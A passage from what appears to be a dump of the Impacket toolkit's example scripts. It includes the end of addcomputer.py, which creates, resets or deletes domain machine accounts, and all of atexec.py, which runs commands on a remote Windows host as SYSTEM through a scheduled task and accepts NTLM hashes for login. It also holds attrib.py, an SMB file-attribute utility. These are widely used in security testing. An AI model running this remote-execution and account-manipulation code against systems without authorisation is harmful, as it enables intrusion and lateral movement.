logging.getLogger().level == logging.DEBUG:\n logging.info(\"Opening domain %s...\" % selectedDomain)\n samrOpenDomainResponse = samr.hSamrOpenDomain(dce, servHandle, samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER , domainSID)\n domainHandle = samrOpenDomainResponse['DomainHandle']\n\n\n if self.__noAdd or self.__delete:\n try:\n checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])\n except samr.DCERPCSessionError as e:\n if e.error_code == 0xc0000073:\n raise Exception(\"Account %s not found in domain %s!\" % (self.__computerName, selectedDomain))\n else:\n raise\n\n userRID = checkForUser['RelativeIds']['Element'][0]\n if self.__delete:\n access = samr.DELETE\n message = \"delete\"\n else:\n access = samr.USER_FORCE_PASSWORD_CHANGE\n message = \"set password for\"\n try:\n openUser = samr.hSamrOpenUser(dce, domainHandle, access, userRID)\n userHandle = openUser['UserHandle']\n except samr.DCERPCSessionError as e:\n if e.error_code == 0xc0000022:\n raise Exception(\"User %s doesn't have right to %s %s!\" % (self.__username, message, self.__computerName))\n else:\n raise\n else:\n if self.__computerName is not None:\n try:\n checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])\n raise Exception(\"Account %s already exists! If you just want to set a password, use -no-add.\" % self.__computerName)\n except samr.DCERPCSessionError as e:\n if e.error_code != 0xc0000073:\n raise\n else:\n foundUnused = False\n while not foundUnused:\n self.__computerName = self.generateComputerName()\n try:\n checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])\n except samr.DCERPCSessionError as e:\n if e.error_code == 0xc0000073:\n foundUnused = True\n else:\n raise\n\n createUser = samr.hSamrCreateUser2InDomain(dce, domainHandle, self.__computerName, samr.USER_WORKSTATION_TRUST_ACCOUNT, samr.USER_FORCE_PASSWORD_CHANGE,)\n userHandle = createUser['UserHandle']\n\n if self.__delete:\n samr.hSamrDeleteUser(dce, userHandle)\n logging.info(\"Successfully deleted %s.\" % self.__computerName)\n userHandle = None\n else:\n samr.hSamrSetPasswordInternal4New(dce, userHandle, self.__computerPassword)\n if self.__noAdd:\n logging.info(\"Successfully set password of %s to %s.\" % (self.__computerName, self.__computerPassword))\n else:\n checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])\n userRID = checkForUser['RelativeIds']['Element'][0]\n openUser = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, userRID)\n userHandle = openUser['UserHandle']\n req = samr.SAMPR_USER_INFO_BUFFER()\n req['tag'] = samr.USER_INFORMATION_CLASS.UserControlInformation\n req['Control']['UserAccountControl'] = samr.USER_WORKSTATION_TRUST_ACCOUNT\n samr.hSamrSetInformationUser2(dce, userHandle, req)\n logging.info(\"Successfully added machine account %s with password %s.\" % (self.__computerName, self.__computerPassword))\n\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n\n logging.critical(str(e))\n finally:\n if userHandle is not None:\n samr.hSamrCloseHandle(dce, userHandle)\n if domainHandle is not None:\n samr.hSamrCloseHandle(dce, domainHandle)\n if servHandle is not None:\n samr.hSamrCloseHandle(dce, servHandle)\n dce.disconnect()\n\n def run(self):\n if self.__method == 'SAMR':\n self.run_samr()\n elif self.__method == 'LDAPS':\n self.run_ldaps()\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Adds a computer account to domain\")\n\n if sys.version_info.major == 2 and sys.version_info.minor == 7 and sys.version_info.micro < 16: #workaround for https://bugs.python.org/issue11874\n parser.add_argument('account', action='store', help='[domain/]username[:password] Account used to authenticate to DC.')\n else:\n parser.add_argument('account', action='store', metavar='[domain/]username[:password]', help='Account used to authenticate to DC.')\n parser.add_argument('-domain-netbios', action='store', metavar='NETBIOSNAME', help='Domain NetBIOS name. Required if the DC has multiple domains.')\n parser.add_argument('-computer-name', action='store', metavar='COMPUTER-NAME$', help='Name of computer to add.'\n 'If omitted, a random DESKTOP-[A-Z0-9]{8} will be used.')\n parser.add_argument('-computer-pass', action='store', metavar='password', help='Password to set to computer'\n 'If omitted, a random [A-Za-z0-9]{32} will be used.')\n parser.add_argument('-no-add', action='store_true', help='Don\\'t add a computer, only set password on existing one.')\n parser.add_argument('-delete', action='store_true', help='Delete an existing computer.')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-method', choices=['SAMR', 'LDAPS'], default='SAMR', help='Method of adding the computer.'\n 'SAMR works over SMB.'\n 'LDAPS has some certificate requirements'\n 'and isn\\'t always available.')\n\n\n parser.add_argument('-port', type=int, choices=[139, 445, 636],\n help='Destination port to connect to. SAMR defaults to 445, LDAPS to 636.')\n\n group = parser.add_argument_group('LDAP')\n group.add_argument('-baseDN', action='store', metavar='DC=test,DC=local', help='Set baseDN for LDAP.'\n 'If ommited, the domain part (FQDN) '\n 'specified in the account parameter will be used.')\n group.add_argument('-computer-group', action='store', metavar='CN=Computers,DC=test,DC=local', help='Group to which the account will be added.'\n 'If omitted, CN=Computers will be used,')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on account parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n group.add_argument('-dc-host', action='store',metavar = \"hostname\", help='Hostname of the domain controller to use. '\n 'If ommited, the domain part (FQDN) '\n 'specified in the account parameter will be used')\n group.add_argument('-dc-ip', action='store',metavar = \"ip\", help='IP of the domain controller to use. '\n 'Useful if you can\\'t translate the FQDN.'\n 'specified in the account parameter will be used')\n\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n logger.init(options.ts, options.debug)\n \n domain, username, password, _, _, options.k = parse_identity(options.account, options.hashes, options.no_pass, options.aesKey, options.k)\n\n if domain == '':\n logging.critical('Domain should be specified!')\n sys.exit(1)\n\n try:\n executer = ADDCOMPUTER(username, password, domain, options)\n executer.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n print(str(e))\n" }, { "path": "examples/atexec.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# ATSVC example for some functions implemented, creates, enums, runs, delete jobs\n# This example executes a command on the target machine through the Task Scheduler\n# service. Returns the output of such command\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# DCE/RPC for TSCH\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport string\nimport sys\nimport argparse\nimport time\nimport random\nimport logging\n\nfrom impacket.examples import logger\nfrom impacket import version\nfrom impacket.dcerpc.v5 import tsch, transport\nfrom impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE, \\\n RPC_C_AUTHN_LEVEL_PKT_PRIVACY\nfrom impacket.examples.utils import parse_target\nfrom impacket.krb5.keytab import Keytab\nfrom six import PY2\n\nCODEC = sys.stdout.encoding\n\nclass TSCH_EXEC:\n def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, doKerberos=False, kdcHost=None,\n command=None, sessionId=None, silentCommand=False):\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = aesKey\n self.__doKerberos = doKerberos\n self.__kdcHost = kdcHost\n self.__command = command\n self.__silentCommand = silentCommand\n self.sessionId = sessionId\n\n if hashes is not None:\n self.__lmhash, self.__nthash = hashes.split(':')\n\n def play(self, addr):\n stringbinding = r'ncacn_np:%s[\\pipe\\atsvc]' % addr\n rpctransport = transport.DCERPCTransportFactory(stringbinding)\n\n if hasattr(rpctransport, 'set_credentials'):\n # This method exists only for selected protocol sequences.\n rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,\n self.__aesKey)\n rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)\n try:\n self.doStuff(rpctransport)\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(e)\n if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >=0:\n logging.info('When STATUS_OBJECT_NAME_NOT_FOUND is received, try running again. It might work')\n\n def doStuff(self, rpctransport):\n def output_callback(data):\n try:\n print(data.decode(CODEC))\n except UnicodeDecodeError:\n logging.error('Decoding error detected, consider running chcp.com at the target,\\nmap the result with '\n 'https://docs.python.org/3/library/codecs.html#standard-encodings\\nand then execute atexec.py '\n 'again with -codec and the corresponding codec')\n print(data.decode(CODEC, errors='replace'))\n\n def xml_escape(data):\n replace_table = {\n \"&\": \"&\",\n '\"': \""\",\n \"'\": \"'\",\n \">\": \">\",\n \"<\": \"<\",\n }\n return ''.join(replace_table.get(c, c) for c in data)\n\n def cmd_split(cmdline):\n cmdline = cmdline.split(\" \", 1)\n cmd = cmdline[0]\n args = cmdline[1] if len(cmdline) > 1 else ''\n\n return [cmd, args]\n\n dce = rpctransport.get_dce_rpc()\n\n dce.set_credentials(*rpctransport.get_credentials())\n if self.__doKerberos is True:\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n dce.connect()\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n dce.bind(tsch.MSRPC_UUID_TSCHS)\n tmpName = ''.join([random.choice(string.ascii_letters) for _ in range(8)])\n tmpFileName = tmpName + '.tmp'\n\n if self.sessionId is not None:\n cmd, args = cmd_split(self.__command)\n else:\n cmd = \"cmd.exe\"\n args = \"/C %s > %%windir%%\\\\Temp\\\\%s 2>&1\" % (self.__command, tmpFileName)\n\n xml = \"\"\"\n\n \n \n 2015-07-15T20:35:13.2757294\n true\n \n 1\n \n \n \n \n \n S-1-5-18\n HighestAvailable\n \n \n \n IgnoreNew\n false\n false\n true\n false\n \n true\n false\n \n true\n true\n true\n false\n false\n P3D\n 7\n \n \n \n %s\n %s\n \n \n\n \"\"\" % ((xml_escape(cmd) if self.__silentCommand is False else self.__command.split()[0]), \n (xml_escape(args) if self.__silentCommand is False else \" \".join(self.__command.split()[1:])))\n taskCreated = False\n try:\n logging.info('Creating task \\\\%s' % tmpName)\n tsch.hSchRpcRegisterTask(dce, '\\\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)\n taskCreated = True\n\n logging.info('Running task \\\\%s' % tmpName)\n done = False\n\n if self.sessionId is None:\n tsch.hSchRpcRun(dce, '\\\\%s' % tmpName)\n else:\n try:\n tsch.hSchRpcRun(dce, '\\\\%s' % tmpName, flags=tsch.TASK_RUN_USE_SESSION_ID, sessionId=self.sessionId)\n except Exception as e:\n if str(e).find('ERROR_FILE_NOT_FOUND') >= 0 or str(e).find('E_INVALIDARG') >= 0 :\n logging.info('The specified session doesn\\'t exist!')\n done = True\n else:\n raise\n\n while not done:\n logging.debug('Calling SchRpcGetLastRunInfo for \\\\%s' % tmpName)\n resp = tsch.hSchRpcGetLastRunInfo(dce, '\\\\%s' % tmpName)\n if resp['pLastRuntime']['wYear'] != 0:\n done = True\n else:\n time.sleep(2)\n\n logging.info('Deleting task \\\\%s' % tmpName)\n tsch.hSchRpcDelete(dce, '\\\\%s' % tmpName)\n taskCreated = False\n except tsch.DCERPCSessionError as e:\n logging.error(e)\n e.get_packet().dump()\n finally:\n if taskCreated is True:\n tsch.hSchRpcDelete(dce, '\\\\%s' % tmpName)\n\n if self.sessionId is not None:\n dce.disconnect()\n return\n\n if self.__silentCommand:\n dce.disconnect()\n return\n\n smbConnection = rpctransport.get_smb_connection()\n waitOnce = True\n while True:\n try:\n logging.info('Attempting to read ADMIN$\\\\Temp\\\\%s' % tmpFileName)\n smbConnection.getFile('ADMIN$', 'Temp\\\\%s' % tmpFileName, output_callback)\n break\n except Exception as e:\n if str(e).find('SHARING') > 0:\n time.sleep(3)\n elif str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:\n if waitOnce is True:\n # We're giving it the chance to flush the file before giving up\n time.sleep(3)\n waitOnce = False\n else:\n raise\n else:\n raise\n logging.debug('Deleting file ADMIN$\\\\Temp\\\\%s' % tmpFileName)\n smbConnection.deleteFile('ADMIN$', 'Temp\\\\%s' % tmpFileName)\n\n dce.disconnect()\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('command', action='store', nargs='*', default=' ', help='command to execute at the target ')\n parser.add_argument('-session-id', action='store', type=int, help='an existed logon session to use (no output, no cmd.exe)')\n parser.add_argument('-ts', action='store_true', help='adds timestamp to every logging output')\n parser.add_argument('-silentcommand', action='store_true', default = False, help='does not execute cmd.exe to run '\n 'given command (no output)')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\\'s output (default '\n '\"%s\"). If errors are detected, run chcp.com at the target, '\n 'map the result with '\n 'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py '\n 'again with -codec and the corresponding codec ' % CODEC)\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n group.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. '\n 'If omitted it will use the domain part (FQDN) specified in the target parameter')\n group.add_argument('-keytab', action=\"store\", help='Read keys for SPN from keytab file')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n if options.codec is not None:\n CODEC = options.codec\n else:\n if CODEC is None:\n CODEC = 'utf-8'\n\n logging.warning(\"This will work ONLY on Windows >= Vista\")\n\n if ''.join(options.command) == ' ':\n logging.error('You need to specify a command to execute!')\n sys.exit(1)\n\n domain, username, password, address = parse_target(options.target)\n\n if domain is None:\n domain = ''\n\n if options.keytab is not None:\n Keytab.loadKeysFromKeytab (options.keytab, username, domain, options)\n options.k = True\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n\n password = getpass(\"Password:\")\n\n if options.aesKey is not None:\n options.k = True\n\n atsvc_exec = TSCH_EXEC(username, password, domain, options.hashes, options.aesKey, options.k, options.dc_ip,\n ' '.join(options.command), options.session_id, options.silentcommand)\n atsvc_exec.play(address)\n" }, { "path": "examples/attrib.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script allows the user to query and modify file / directory attributes - utilizing pure SMB.\n#\n# Author:\n# Raz Kissos (@covertivy)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import annotations\nimport sys\nimport argparse\nimport logging\nimport ntpath\nfrom dataclasses import dataclass\n\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket import version\nfrom impacket import smbconnection\nfrom impacket.nmb import SMB_SESSION_PORT\nfrom impacket.smb import (\n SMB_DIALECT, \n FILE_READ_ATTRIBUTES,\n FILE_WRITE_ATTRIBUTES,\n FILE_SHARE_READ,\n FILE_SHARE_WRITE,\n FILE_SHARE_DELETE,\n SMB_QUERY_FILE_BASIC_INFO,\n SMB_SET_FILE_BASIC_INFO,\n SMBQueryFileBasicInfo,\n SMBSetFileBasicInfo,\n)\nfrom impacket.smb3structs import (\n SMB2_FILE_BASIC_INFO,\n FILE_BASIC_INFORMATION,\n)\n\n\nATTRIB_QUERY_ACTION = 'query'\nATTRIB_SET_ACTION = 'set'\nVALID_ATTRIB_ACTIONS = (ATTRIB_QUERY_ACTION, ATTRIB_SET_ACTION)\n\n# All Knwon File Attributes according to [MS-FSCC] 2.6 File Attributes.\nFILE_ATTRIBUTE_READONLY = 0x00000001\nFILE_ATTRIBUTE_HIDDEN = 0x00000002\nFILE_ATTRIBUTE_SYSTEM = 0x00000004\nFILE_ATTRIBUTE_VOLUME = 0x00000008\nFILE_ATTRIBUTE_DIRECTORY = 0x00000010\nFILE_ATTRIBUTE_ARCHIVE = 0x00000020\nFILE_ATTRIBUTE_NORMAL = 0x00000080\nFILE_ATTRIBUTE_TEMPORARY = 0x00000100\nFILE_ATTRIBUTE_SPARSE_FILE = 0x00000200\nFILE_ATTRIBUTE_REPARSE_POINT = 0x00000400\nFILE_ATTRIBUTE_COMPRESSED = 0x00000800\nFILE_ATTRIBUTE_OFFLINE = 0x00001000\nFILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x00002000\nFILE_ATTRIBUTE_ENCRYPTED = 0x00004000\nFILE_ATTRIBUTE_NO_SCRUB_DATA = 0x00020000\nFILE_ATTRIBUTE_RECALL_ON_OPEN = 0x00040000\nFILE_ATTRIBUTE_PINNED = 0x00080000\nFILE_ATTRIBUTE_UNPINNED = 0x00100000\nFILE_ATTRIBUTE_RECALL_ON_DATA_ACCESS = 0x00400000\n\n\n@dataclass\nclass FileAttributes:\n readonly: bool = False\n hidden: bool = False\n system: bool = False\n volume: bool = False\n directory: bool = False\n archive: bool = False\n normal: bool = False\n temporary: bool = False\n sparse_file: bool = False\n reparse_point: bool = False\n compressed: bool = False\n offline: bool = False\n not_content_indexed: bool = False\n encrypted: bool = False\n no_scrub_data: bool = False\n recall_on_open: bool = False\n pinned: bool = False\n unpinned: bool = False\n recall_on_data_access: bool = False\n \n def pack(self) -> int:\n return \\\n (FILE_ATTRIBUTE_READONLY if self.readonly else 0) | \\\n (FILE_ATTRIBUTE_HIDDEN if self.hidden else 0) | \\\n (FILE_ATTRIBUTE_SYSTEM if self.system else 0) | \\\n (FILE_ATTRIBUTE_VOLUME if self.volume else 0) | \\\n (FILE_ATTRIBUTE_DIRECTORY if self.directory else 0) | \\\n (FILE_ATTRIBUTE_ARCHIVE if self.archive else 0) | \\\n (FILE_ATTRIBUTE_NORMAL if self.normal else 0) | \\\n (FILE_ATTRIBUTE_TEMPORARY if self.temporary else 0) | \\\n (FILE_ATTRIBUTE_SPARSE_FILE if self.sparse_file else 0) | \\\n (FILE_ATTRIBUTE_REPARSE_POINT if self.reparse_point else 0) | \\\n (FILE_ATTRIBUTE_COMPRESSED if self.compressed else 0) | \\\n (FILE_ATTRIBUTE_OFFLINE if self.offline else 0) | \\\n (FILE_ATTRIBUTE_NOT_CONTENT_INDEXED if self.not_content_indexed else 0) | \\\n (FILE_ATTRIBUTE_ENCRYPTED if self.encrypted else 0) | \\\n (FILE_ATTRIBUTE_NO_SCRUB_DATA if self.no_scrub_data else 0) | \\\n (FILE_ATTRIBUTE_RECALL_ON_OPEN if self.recall_on_open else 0) | \\\n (FILE_ATTRIBUTE_PINNED if self.pinned else 0) | \\\n (FILE_ATTRIBUTE_UNPINNED if self.unpinned else 0) | \\\n (FILE_ATTRIBUTE_RECALL_ON_DATA_ACCESS if self.recall_on_data_access else 0)\n \n @classmethod\n def unpack(cls, data: int) -> FileAttributes:\n return cls(\n readonly = bool(data & FILE_ATTRIBUTE_READONLY),\n hidden = bool(data & FILE_ATTRIBUTE_HIDDEN),\n system = bool(data & FILE_ATTRIBUTE_SYSTEM),\n volume = bool(data & FILE_ATTRIBUTE_VOLUME),\n directory = bool(data & FILE_ATTRIBUTE_DIRECTORY),\n archive = bool(data & FILE_ATTRIBUTE_ARCHIVE),\n normal = bool(data & FILE_ATTRIBUTE_NORMAL),\n temporary = bool(data & FILE_ATTRIBUTE_TEMPORARY),\n sparse_file = bool(data & FILE_ATTRIBUTE_SPARSE_FILE),\n reparse_point = bool(data & FILE_ATTRIBUTE_REPARSE_POINT),\n compressed = bool(data & FILE_ATTRIBUTE_COMPRESSED),\n offline = bool(data & FILE_ATTRIBUTE_OFFLINE),\n not_content_indexed = bool(data & FILE_ATTRIBUTE_NOT_CONTENT_INDEXED),\n encrypted = bool(data & FILE_ATTRIBUTE_ENCRYPTED),\n no_scrub_data = bool(data & FILE_ATTRIBUTE_NO_SCRUB_DATA),\n recall_on_open = bool(data & FILE_ATTRIBUTE_RECALL_ON_OPEN),\n pinned = bool(data & FILE_ATTRIBUTE_PINNED),\n unpinned = bool(data & FILE_ATTRIBUTE_UNPINNED),\n recall_on_data_access = bool(data & FILE_ATTRIBUTE_RECALL_ON_DATA_ACCESS),\n )\n\n @staticmethod\n def repr_attribs(data: int) -> str:\n return FileAttributes.unpack(data).__repr__()\n \n def __repr__(self) -> str:\n return \\\n ('R' if self.readonly else '-') + \\\n ('H' if self.hidden else '-') + \\\n ('S' if self.system else '-') + \\\n ('V' if self.volume else '-') + \\\n ('D' if self.directory else '-') + \\\n ('A' if self.archive else '-') + \\\n ('N' if self.normal else '-') + \\\n ('T' if self.temporary else '-') + \\\n ('C' if self.compressed else '-') + \\\n ('O' if self.offline else '-') + \\\n ('E' if self.encrypted else '-') + \\\n ('P' if self.pinned else '-') + \\\n ('U' if self.unpinned else '-')\n \n\ndef attrib_query(connection: smbconnection.SMBConnection, tid: int, fid: int) -> FileAttributes:\n if connection.getDialect() == SMB_DIALECT:\n basicinfo = SMBQueryFileBasicInfo(connection.queryInfo(tid, fid, SMB_QUERY_FILE_BASIC_INFO))\n attributes = basicinfo['ExtFileAttributes']\n else:\n basicinfo = FILE_BASIC_INFORMATION(connection.queryInfo(tid, fid, SMB2_FILE_BASIC_INFO))\n attributes = basicinfo['FileAttributes']\n \n logging.debug(f\"Got file / directory {attributes = }\")\n return FileAttributes.unpack(attributes)\n\ndef attrib_set(connection: smbconnection.SMBConnection, tid: int, fid: int, attribs: FileAttributes) -> None:\n if connection.getDialect() == SMB_DIALECT:\n info_data = SMBSetFileBasicInfo()\n info_data['CreationTime'] = 0\n info_data['LastAccessTime'] = 0\n info_data['LastWriteTime'] = 0\n info_data['ChangeTime'] = 0\n info_data['ExtFileAttributes'] = attribs.pack()\n fileInfoClass = SMB_SET_FILE_BASIC_INFO\n else:\n info_data = FILE_BASIC_INFORMATION()\n info_data['CreationTime'] = 0\n info_data['LastAccessTime'] = 0\n info_data['LastWriteTime'] = 0\n info_data['ChangeTime'] = 0\n info_data['FileAttributes'] = attribs.pack()\n fileInfoClass = SMB2_FILE_BASIC_INFO\n \n logging.debug(f\"Setting file / directory attributes = {attribs.pack()}\")\n \n connection.setInfo(tid, fid, fileInfoClass, info_data)\n\n\ndef main():\n # Init the example's logger theme\n logger.init()\n print(version.BANNER)\n parser = argparse.ArgumentParser(add_help = True, description = \"File Attribute Modification Utility implementation.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument(\"share\", type=str, help=\"The share in which the desired file to query or modify resides.\")\n parser.add_argument(\"path\", type=str, help=\"The path of the desired file whose attributes we wish to query or modify.\")\n \n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='Don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n group.add_argument('-p', '--port', default=SMB_SESSION_PORT, type=int, metavar=\"destination port\", help='Destination port to connect to the SMB Server.')\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\",\n help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '\n 'the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n group.add_argument('-t', '--timeout', default=60, type=int, metavar=\"seconds\", help='Set connection timeout (seconds).')\n\n subcommands = parser.add_subparsers(dest=\"action\")\n \n query_parser = subcommands.add_parser(ATTRIB_QUERY_ACTION, help=\"Query current file / directory attributes.\")\n \n set_parser = subcommands.add_parser(ATTRIB_SET_ACTION, help=\"Modify file / directory attributes.\") \n set_parser.add_argument('-r', '--readonly', dest='readonly', action='store_true', help=\"A file or directory that is read-only. For a file, applications can read the file but cannot write to it or delete it. For a directory, applications cannot delete it, but applications can create and delete files from that directory.\")\n set_parser.add_argument('-H', '--hidden', dest='hidden', action='store_true', help=\"A file or directory that is hidden. Files and directories marked with this attribute do not appear in an ordinary directory listing.\")\n set_parser.add_argument('-s', '--system', dest='system', action='store_true', help=\"A file or directory that the operating system uses a part of or uses exclusively.\")\n set_parser.add_argument('-a', '--archive', dest='archive', action='store_true', help=\"A file or directory that requires to be archived. Applications use this attribute to mark files for backup or removal.\")\n set_parser.add_argument('-n', '--normal', dest='normal', action='store_true', help=\"A file that does not have other attributes set. This flag is used to clear all other flags by specifying it with no other flags set.\")\n set_parser.add_argument('-t', '--temporary', dest='temporary', action='store_true', help=\"A file that is being used for temporary storage. The operating system can choose to store this file's data in memory rather than on mass storage, writing the data to mass storage only if data remains in the file when the file is closed.\")\n set_parser.add_argument('-c', '--compressed', dest='compressed', action='store_true', help=\"A file or directory that is compressed. For a file, all of the data in the file is compressed. For a directory, compression is the default for newly created files and subdirectories.\")\n set_parser.add_argument('-o', '--offline', dest='offline', action='store_true', help=\"The data in this file is not available immediately. This attribute indicates that the file data is physically moved to offline storage. This attribute is used by Remote Storage, which is hierarchical storage management software.\")\n set_parser.add_argument('-e', '--encrypted', dest='encrypted', action='store_true', help=\"A file or directory that is encrypted. For a file, all data streams in the file are encrypted. For a directory, encryption is the default for newly created files and subdirectories.\")\n set_parser.add_argument('-p', '--pinned', dest='pinned', action='store_true', help=\"This attribute indicates user intent that the file or directory should be kept fully present locally even when not being actively accessed. This attribute is for use with hierarchical storage management software.\")\n set_parser.add_argument('-u', '--unpinned', dest='unpinned', action='store_true', help=\"This attribute indicates that the file or directory should not be kept fully present locally except when being actively accessed. This attribute is for use with hierarchical storage management software.\")\n \n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n if options.debug is True:\n logging.getLogger().setLevel(logging.DEBUG)\n # Print the Library's installation path\n logging.debug(version.getInstallationPath())\n else:\n logging.getLogger().setLevel(logging.INFO)\n\n if options.action not in VALID_ATTRIB_ACTIONS:\n logging.error(\"Invalid action '{action}'\".format(action=options.action))\n \n domain, username, password, address = parse_target(options.target)\n\n if options.target_ip is None:\n options.target_ip = address\n\n if domain is None:\n domain = ''\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if options.aesKey is not None:\n options.k = True\n\n if options.hashes is not None:\n lmhash, nthash = options.hashes.split(':')\n else:\n lmhash = ''\n nthash = ''\n \n share = options.share\n path = ntpath.normpath(options.path)\n\n try:\n connection = smbconnection.SMBConnection(address, options.target_ip, sess_port=int(options.port), timeout=int(options.timeout))\n if options.k is True:\n connection.kerberosLogin(username, password, domain, lmhash, nthash, options.aesKey, options.dc_ip)\n else:\n connection.login(username, password, domain, lmhash, nthash)\n\n tid = connection.connectTree(share)\n \n if options.action == 'query':\n desiredAccess = FILE_READ_ATTRIBUTES\n elif options.action == 'set':\n desiredAccess = FILE_WRITE_ATTRIBUTES\n \n fid = connection.openFile(\n tid, \n path, \n shareMode=FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, # Allow other processes to interact with the file / directory.\n creationOption=0, # Open both a file or a directory without limitation.\n desiredAccess=desiredAccess # Request only the permissions we need.\n )\n \n try:\n if options.action == 'query':\n print(attrib_query(connection, tid, fid), share, path)\n elif options.action == 'set':\n attribs = FileAttributes(\n readonly = options.readonly,\n hidden = options.hidden,\n system = options.system,\n archive = options.archive,\n normal = options.normal,\n temporary = options.temporary,\n compressed = options.compressed,\n offline = options.offline,\n encrypted = options.encrypted,\n pinned = options.pinned,\n unpinned = options.unpinned,\n )\n attrib_set(connection, tid, fid, attribs)\n print(attribs, share, path)\n finally:\n connection.closeFile(tid, fid)\n connection.disconnectTree(tid)\n connection.close()\n \n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "path": 